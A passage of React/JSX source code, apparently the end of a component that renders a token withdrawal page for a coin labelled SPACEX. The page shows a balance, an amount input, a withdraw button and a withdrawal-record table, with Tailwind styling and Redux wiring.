                        <span className=' text-green-500'>PRESALE LIVE</span>
                    </div> */}
                    <div className='mt-2 w-full flex flex-col items-center relative'>
                        {/* <img className='-bottom-5  absolute z-[40]'  src={require('../../assets/ipo/arr.png')} style={{"width":"30px"}}></img> */}
                        <div className="w-full min-h-[30px]
                                relative inline-flex flex-col h-4  justify-start 
                                px-3 py-2 text-white text-[10px]  tracking-wider
                                [--cut:4px] [--border:1px]
                                before:absolute before:inset-0 before:bg-gray-800
                                before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                after:absolute after:inset-[var(--border)] after:bg-[#070F13]
                                after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                            ">
                            <div className='w-full z-10 flex flex-row justify-between items-center'>
                                <div  onClick={()=>goLiushui("/record_spacex_mint")}>
                                <span className='text-[10px] leading-[10px] text-gray-400'>{t('tr.当前余额')}: <NumberFormat
                                thousandsGroupStyle="thousand"
                                value={meba}
                                prefix=""
                                decimalSeparator="."
                                displayType="text"
                                type="text"
                                thousandSeparator={true}
                                fixedDecimalScale={true}
                                allowNegative={false}
                                decimalScale={2} /></span>
                                <span className='text-[10px] leading-[10px] text-gray-400 ml-1'>[{t('asset.记录')}]</span>
                                </div>
                                
                                <span className='text-[10px] leading-[10px] text-text1'>{t('tr.可提额度')}: <NumberFormat
                                thousandsGroupStyle="thousand"
                                value={edu}
                                prefix=""
                                decimalSeparator="."
                                displayType="text"
                                type="text"
                                thousandSeparator={true}
                                fixedDecimalScale={true}
                                allowNegative={false}
                                decimalScale={2} /></span>
                            </div>
                           
                           
                        
                        </div>
                    </div>

                    <div className='mt-2 w-full flex flex-col items-center relative'>
                        <div className="w-full min-h-[50px]
                                relative inline-flex flex-col h-4  justify-start 
                                px-3 py-2 text-white text-[10px]  tracking-wider
                                [--cut:4px] [--border:1px]
                                before:absolute before:inset-0 before:bg-gray-800
                                before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                after:absolute after:inset-[var(--border)] after:bg-[#070F13]
                                after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                            ">
                            <div className='w-full z-10 flex flex-row justify-between items-center'>
                                <span className='text-[10px] leading-[10px] text-text1'>{t('mint.接收')}</span>
                                {/* <span className='text-[9px] leading-[9px] text-gray-400'>BALANCE: 0.00 SPACEX</span> */}
                            </div>
                           <div className='mt-1 w-full z-10 flex flex-row justify-between items-center'>
                                <div className="w-[100px]
                                    relative inline-flex h-5 items-center justify-start
                                    px-2 py-3 text-white text-[10px]  tracking-wider
                                    [--cut:3px] [--border:1px]
                                    before:absolute before:inset-0 before:bg-gray-800
                                    before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                    after:absolute after:inset-[var(--border)] after:bg-[#050D11]
                                    after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                ">
                                     <img className='  z-10' alt='logo' src={require('../../assets/ipo/bnb.png')} style={{"width":"17px"}}></img>
                                     <span className="ml-1 z-10 text-[12px] text-[#F9B514]">SPACEX</span>
                                    <span className='z-10 ml-1 text-[8px] flex flex-row items-center text-[#F9B514]'><DownOutlined  /></span>
                                </div>
                                <div className=' w-1/2    flex flex-row justify-center items-center  '>
                                            <input  type="number"   onInput={(e)=>setValueCol(e.target.value)} value={valueCol} placeholder={t('mint.输入最低')+" SPACEX"}  className='placeholder:text-[10px] w-full text-base text-white input1 text-right '  />
                                    </div>
                            </div>
                        </div>
                    </div>
                    <div className="flex justify-center w-full mt-3">
                        <button onClick={_ti} className="sci-glow-btn"> <span>{t('air.提取')}</span></button>
                    </div>
                    <div className=' mt-1 w-full flex flex-row justify-center items-center'>
                        <img className='  z-10' alt='logo' src={require('../../assets/ipo/lock.png')} style={{"width":"8px"}}></img>
                        <span className="ml-1 z-10 text-[10px] text-gray-600">Secure Transaction</span>
                    </div>
                    
                </div>
                {/*  */}
               

                {/*  */}
                <div className='recordbg mx-4 h-36 px-4 py-4 mt-2 flex flex-col'>
                    <div className='w-full flex flex-row justify-between items-center'>
                        <span className='text-text1 text-xs'>{t('air.提取记录')}</span>
                        <span onClick={()=>setIsShowMenu(true)} className='text-text1 text-[10px]'>{t('mint.全部')}</span>
                    </div>
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12'>{t('air.状态')}</span>
                       
                        <span className='w-4/12 text-center'>SPACEX</span>
                        <span className='w-3/12'>{t('air.单据')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    
                    {
                            childs.length>0?
                            childs.slice(0,3).map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                            <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                            
                                            <span className='w-4/12 text-center'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.value}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                            </span>
                                            <div  className='w-3/12 flex flex-row items-center justify-start'>
                                                <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                            </div>
                                        </div>
                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }
                    


                
                </div>

                {/*  */}
                
                {/*  */}
                <div className=' h-[100px]'></div>
            </div>
           
            
               
           <Foot/>
        </>
    );
}

const mapDispatchToProps = (dispatch) =>{
    return{

        setIsLogin(value){
            const action ={type:"setIsLogin",value:value}
            dispatch(action)
        },

        setPAddress(value){
            const action ={type:"setPAddress",value:value}
            dispatch(action)
        },
        setFlash(value){
            const action ={type:"setFlash",value:value}
            dispatch(action)
        }
    }
}
export default connect(mapStateToProps,mapDispatchToProps)(Challenge);
